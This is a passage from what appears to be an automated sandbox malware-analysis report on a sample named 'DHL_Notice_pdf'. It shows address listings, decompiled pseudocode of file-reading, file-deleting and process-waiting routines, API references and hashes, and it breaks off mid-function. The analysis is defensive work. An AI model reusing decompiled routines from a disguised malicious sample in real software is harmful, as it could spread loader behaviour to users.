                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00407447
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x0040744d
                                                            0x00407447
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f44
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d
                                                            0x00406f60
                                                            0x00406f62
                                                            0x00406f65
                                                            0x00406f68
                                                            0x00406f6b
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00000000
                                                            0x00000000
                                                            0x004070cf
                                                            0x004070cf
                                                            0x004070d3
                                                            0x00407599
                                                            0x00000000
                                                            0x00407599
                                                            0x004070d9
                                                            0x004070dc
                                                            0x004070df
                                                            0x004070e2
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070ea
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f3
                                                            0x004070f6
                                                            0x004070f7
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070fc
                                                            0x004070ff
                                                            0x00407102
                                                            0x00407105
                                                            0x00407105
                                                            0x00407105
                                                            0x00407108
                                                            0x0040710a
                                                            0x0040710a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040734c
                                                            0x0040734c
                                                            0x0040734c
                                                            0x00407350
                                                            0x00000000
                                                            0x00000000
                                                            0x00407356
                                                            0x00407359
                                                            0x0040735c
                                                            0x0040735f
                                                            0x00407361
                                                            0x00407361
                                                            0x00407361
                                                            0x00407364
                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x0040710d
                                                            0x0040710d
                                                            0x00000000
                                                            0x0040710d
                                                            0x0040738e
                                                            0x004075c3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x004075fa
                                                            0x004075fa
                                                            0x00000000
                                                            0x004075fa
                                                            0x00407447
                                                            0x004073ce
                                                            0x004073cb

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40f21d
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                            0x00403489
                                                            0x0040349c
                                                            0x004034a1
                                                            0x004035d1
                                                            0x004035d3
                                                            0x00000000
                                                            0x004035d9
                                                            0x004034ad
                                                            0x004034c0
                                                            0x004034c6
                                                            0x004034cc
                                                            0x004034d7
                                                            0x004034dc
                                                            0x004034e1
                                                            0x004034e9
                                                            0x004034eb
                                                            0x004034eb
                                                            0x004034f4
                                                            0x004034fb
                                                            0x00000000
                                                            0x00000000
                                                            0x00403501
                                                            0x00403507
                                                            0x0040350d
                                                            0x00000000
                                                            0x00403513
                                                            0x00403519
                                                            0x00403539
                                                            0x0040353e
                                                            0x00403543
                                                            0x00403549
                                                            0x0040354f
                                                            0x00403559
                                                            0x00403560
                                                            0x00000000
                                                            0x00000000
                                                            0x00403562
                                                            0x00403568
                                                            0x0040356a
                                                            0x0040358d
                                                            0x00403593
                                                            0x00000000
                                                            0x00000000
                                                            0x00403595
                                                            0x00403597
                                                            0x00000000
                                                            0x00000000
                                                            0x00403599
                                                            0x00403599
                                                            0x004035ac
                                                            0x00000000
                                                            0x00000000
                                                            0x004035bb
                                                            0x00000000
                                                            0x004035bb
                                                            0x00403574
                                                            0x0040357b
                                                            0x004035c8
                                                            0x004035ce
                                                            0x004035ce
                                                            0x00000000
                                                            0x004035ce
                                                            0x0040357d
                                                            0x00403583
                                                            0x00403589
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004035cc
                                                            0x004035cc
                                                            0x00000000
                                                            0x004035cc
                                                            0x00000000

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 0040348D
                                                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer$CountTick
                                                            • String ID:
                                                            • API String ID: 1092082344-0
                                                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 41%
                                                            			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                            0x00405d2d
                                                            0x00405d38
                                                            0x00405d3d
                                                            0x00405d6d
                                                            0x00000000
                                                            0x00405d6d
                                                            0x00405d44
                                                            0x00405d45
                                                            0x00405d4f
                                                            0x00405d47
                                                            0x00405d47
                                                            0x00405d47
                                                            0x00405d57
                                                            0x00405d63
                                                            0x00405d67
                                                            0x00405d67
                                                            0x00000000
                                                            0x00405d59
                                                            0x00000000
                                                            0x00405d5b

                                                            APIs
                                                              • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                              • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                            • String ID:
                                                            • API String ID: 1655745494-0
                                                            • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                            • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                            • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                            • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                            0x00406af1
                                                            0x00406b08
                                                            0x00406afc
                                                            0x00406b06
                                                            0x00406b06
                                                            0x00406b13
                                                            0x00406b1f

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                            • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ObjectSingleWait$CodeExitProcess
                                                            • String ID:
                                                            • API String ID: 2567322000-0
                                                            • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                            • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                            • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                            • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                            0x00403375
                                                            0x0040337e
                                                            0x00403387
                                                            0x0040338b
                                                            0x00403396
                                                            0x00403396
                                                            0x0040339e
                                                            0x004033a5
                                                            0x004033b7
                                                            0x004033be
                                                            0x00403463
                                                            0x00403463
                                                            0x00000000
                                                            0x004033c4
                                                            0x004033c7
                                                            0x004033d3
                                                            0x004033d7
                                                            0x00403471
                                                            0x00403471
                                                            0x004033dd
                                                            0x004033e0
                                                            0x0040343f
                                                            0x00403445
                                                            0x00403447
                                                            0x00403447
                                                            0x00403459
                                                            0x00403461
                                                            0x00403468
                                                            0x0040346b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004033e2
                                                            0x004033e5
                                                            0x00000000
                                                            0x004033eb
                                                            0x004033f0
                                                            0x004033f7
                                                            0x004033fa
                                                            0x004033fc
                                                            0x004033fc
                                                            0x00403409
                                                            0x0040340c
                                                            0x00403413
                                                            0x00000000
                                                            0x00000000
                                                            0x0040341c
                                                            0x00403423
                                                            0x0040343b
                                                            0x00403465
                                                            0x00403465
                                                            0x00403425
                                                            0x00403425
                                                            0x00403428
                                                            0x0040342b
                                                            0x00403431
                                                            0x00403437
                                                            0x00000000
                                                            0x00403439
                                                            0x00000000
                                                            0x00403439
                                                            0x00403437
                                                            0x00000000
                                                            0x00403423
                                                            0x00000000
                                                            0x004033f0
                                                            0x004033e5
                                                            0x004033e0
                                                            0x004033d7
                                                            0x004033be
                                                            0x00403473
                                                            0x00403476

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
